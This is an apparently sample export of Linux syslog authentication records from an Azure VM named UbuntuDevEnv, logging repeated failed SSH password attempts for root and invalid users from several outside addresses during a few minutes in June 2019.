+14340,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:52,UbuntuDevEnv,2019-06-26 04:57:51,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 54512: Too many authentication failures [preauth],3433,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,54512,,
+14341,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:52,UbuntuDevEnv,2019-06-26 04:57:51,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3433,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14342,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:52,UbuntuDevEnv,2019-06-26 04:57:51,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 54512 ssh2 [preauth],3433,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,54512,,
+14343,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:52,UbuntuDevEnv,2019-06-26 04:57:51,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,3433,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14344,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:52,UbuntuDevEnv,2019-06-26 04:57:51,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 54512 ssh2],3433,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,54512,,
+14345,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:55,UbuntuDevEnv,2019-06-26 04:57:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14346,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:57,UbuntuDevEnv,2019-06-26 04:57:57,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 60306 ssh2,3508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60306,,
+14347,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:01,UbuntuDevEnv,2019-06-26 04:57:59,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 60306 ssh2,3508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60306,,
+14348,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:02,UbuntuDevEnv,2019-06-26 04:58:02,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 60306 ssh2,3508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60306,,
+14349,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:10,UbuntuDevEnv,2019-06-26 04:58:09,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 60306: Too many authentication failures [preauth],3508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,60306,,
+14350,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:10,UbuntuDevEnv,2019-06-26 04:58:09,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,3508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14351,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:10,UbuntuDevEnv,2019-06-26 04:58:09,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 60306 ssh2 [preauth],3508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60306,,
+14352,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:10,UbuntuDevEnv,2019-06-26 04:58:09,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 60306 ssh2],3508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60306,,
+14353,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:10,UbuntuDevEnv,2019-06-26 04:58:09,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14354,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:13,UbuntuDevEnv,2019-06-26 04:58:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3573,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14355,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:15,UbuntuDevEnv,2019-06-26 04:58:15,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 1380 ssh2,3573,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,1380,,
+14356,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:28,UbuntuDevEnv,2019-06-26 04:58:27,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3573,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14357,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:28,UbuntuDevEnv,2019-06-26 04:58:27,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,3573,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14358,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:28,UbuntuDevEnv,2019-06-26 04:58:27,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 1380 ssh2 [preauth],3573,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,1380,,
+14359,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:28,UbuntuDevEnv,2019-06-26 04:58:27,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 1380: Too many authentication failures [preauth],3573,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,1380,,
+14360,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:28,UbuntuDevEnv,2019-06-26 04:58:27,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 1380 ssh2],3573,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,1380,,
+14361,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:31,UbuntuDevEnv,2019-06-26 04:58:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3634,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14362,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:32,UbuntuDevEnv,2019-06-26 04:58:31,auth,UbuntuDevEnv,info,Invalid user tex from 200.6.188.38 port 24322,3639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tex,200.6.188.3,24322,,
+14363,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:32,UbuntuDevEnv,2019-06-26 04:58:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14364,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:32,UbuntuDevEnv,2019-06-26 04:58:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,3639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+14365,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:33,UbuntuDevEnv,2019-06-26 04:58:32,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 6934 ssh2,3634,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,6934,,
+14366,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:34,UbuntuDevEnv,2019-06-26 04:58:33,auth,UbuntuDevEnv,info,Failed password for invalid user tex from 200.6.188.38 port 24322 ssh2,3639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tex,200.6.188.3,24322,,
+14367,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:34,UbuntuDevEnv,2019-06-26 04:58:33,auth,UbuntuDevEnv,info,Disconnected from invalid user tex 200.6.188.38 port 24322 [preauth],3639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tex,200.6.188.3,24322,,
+14368,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:34,UbuntuDevEnv,2019-06-26 04:58:33,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 24322:11: Bye Bye [preauth],3639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,24322,,
+14369,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:36,UbuntuDevEnv,2019-06-26 04:58:35,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 6934 ssh2,3634,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,6934,,
+14370,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:45,UbuntuDevEnv,2019-06-26 04:58:43,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 6934 ssh2],3634,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,6934,,
+14371,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:45,UbuntuDevEnv,2019-06-26 04:58:44,auth,UbuntuDevEnv,info,Invalid user admin from 5.135.161.72 port 46010,3688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,5.135.161.7,46010,,
+14372,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:45,UbuntuDevEnv,2019-06-26 04:58:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:45,UbuntuDevEnv,2019-06-26 04:58:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,3688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+14374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:47,UbuntuDevEnv,2019-06-26 04:58:46,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 6934 ssh2,3634,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,6934,,
+14375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:47,UbuntuDevEnv,2019-06-26 04:58:46,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3634,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:47,UbuntuDevEnv,2019-06-26 04:58:46,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,3634,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:47,UbuntuDevEnv,2019-06-26 04:58:46,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 6934: Too many authentication failures [preauth],3634,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,6934,,
+14378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:47,UbuntuDevEnv,2019-06-26 04:58:46,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 6934 ssh2 [preauth],3634,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,6934,,
+14379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:47,UbuntuDevEnv,2019-06-26 04:58:47,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 5.135.161.72 port 46010 ssh2,3688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,5.135.161.7,46010,,
+14380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:47,UbuntuDevEnv,2019-06-26 04:58:47,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 46010:11: Bye Bye [preauth],3688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,46010,,
+14381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:47,UbuntuDevEnv,2019-06-26 04:58:47,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 5.135.161.72 port 46010 [preauth],3688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,5.135.161.7,46010,,
+14382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:50,UbuntuDevEnv,2019-06-26 04:58:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:52,UbuntuDevEnv,2019-06-26 04:58:52,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 12724 ssh2,3707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12724,,
+14384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:55,UbuntuDevEnv,2019-06-26 04:58:54,auth,UbuntuDevEnv,info,Invalid user 424246 from 95.216.195.95 port 39790,3730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,424246,95.216.195.9,39790,,
+14385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:55,UbuntuDevEnv,2019-06-26 04:58:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:55,UbuntuDevEnv,2019-06-26 04:58:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,3730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+14387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:55,UbuntuDevEnv,2019-06-26 04:58:54,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 12724 ssh2,3707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12724,,
+14388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:56,UbuntuDevEnv,2019-06-26 04:58:56,auth,UbuntuDevEnv,info,Failed password for invalid user 424246 from 95.216.195.95 port 39790 ssh2,3730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,424246,95.216.195.9,39790,,
+14389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:56,UbuntuDevEnv,2019-06-26 04:58:56,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 39790:11: Bye Bye [preauth],3730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,39790,,
+14390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:56,UbuntuDevEnv,2019-06-26 04:58:56,auth,UbuntuDevEnv,info,Disconnected from invalid user 424246 95.216.195.95 port 39790 [preauth],3730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,424246,95.216.195.9,39790,,
+14391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:58:58,UbuntuDevEnv,2019-06-26 04:58:57,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 12724 ssh2,3707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12724,,
+14392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:01,UbuntuDevEnv,2019-06-26 04:59:00,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 12724 ssh2,3707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12724,,
+14393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:03,UbuntuDevEnv,2019-06-26 04:59:02,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 12724 ssh2,3707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12724,,
+14394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:06,UbuntuDevEnv,2019-06-26 04:59:06,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 12724 ssh2,3707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12724,,
+14395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:06,UbuntuDevEnv,2019-06-26 04:59:06,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:06,UbuntuDevEnv,2019-06-26 04:59:06,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,3707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:06,UbuntuDevEnv,2019-06-26 04:59:06,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 12724 ssh2 [preauth],3707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12724,,
+14398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:59:06,UbuntuDevEnv,2019-06-26 04:59:06,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 12724: Too many authentication failures [preauth],3707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,12724,,
